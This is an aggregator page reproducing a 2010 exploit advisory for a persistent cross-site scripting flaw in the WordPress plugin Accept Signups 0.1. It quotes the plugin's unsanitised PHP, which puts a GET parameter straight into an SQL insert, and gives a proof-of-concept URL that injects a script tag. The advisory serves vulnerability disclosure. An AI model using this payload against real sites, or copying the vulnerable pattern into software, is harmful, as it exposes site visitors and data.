Lucene search
K

WordPress Accept Signups 0.1 Cross Site Scripting

🗓️ 22 Dec 2010 00:00:00Reported by clshackType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Vulnerability in WORDPRESS Accept Signups 0.1 Plugi

Code
`# Exploit Title: WORDPRESS Plugin Accept Signups PERSISTENT XSS  
# Date:21/12/2010  
# Author: clshack  
# Software Link:http://wordpress.org/extend/plugins/accept-signups/  
# Version:0.1  
# Tested on: wordpress 3.03  
# CVE :  
Vulnerable code accept-signups_submit.php:  
require_once('../../../wp-config.php');//*addslashes* to GET and POST  
  
$e=$_GET['email'];  
function saveEmail($e) {  
global $wpdb;  
$tbl = '`' . DB_NAME . '`.`' . $wpdb->prefix . 'accept-signups`';  
$q = "insert into " .$tbl . " (email, ip, timestamp) value ('$e', '".  
$_SERVER['REMOTE_ADDR'] . "', now());";  
return $wpdb->query($wpdb->prepare($q));  
}  
  
Poc:  
http://localhost/wordpress/*wp-content/plugins/accept-signups/accept-signups_submit.php?email=clshack<script>alert(String.fromCharCode(72,  
101, 108, 108, 111, 32, 58, 68, 32))</script>*  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Dec 2010 00:00Current
0.1Low risk
Vulners AI Score0.1
20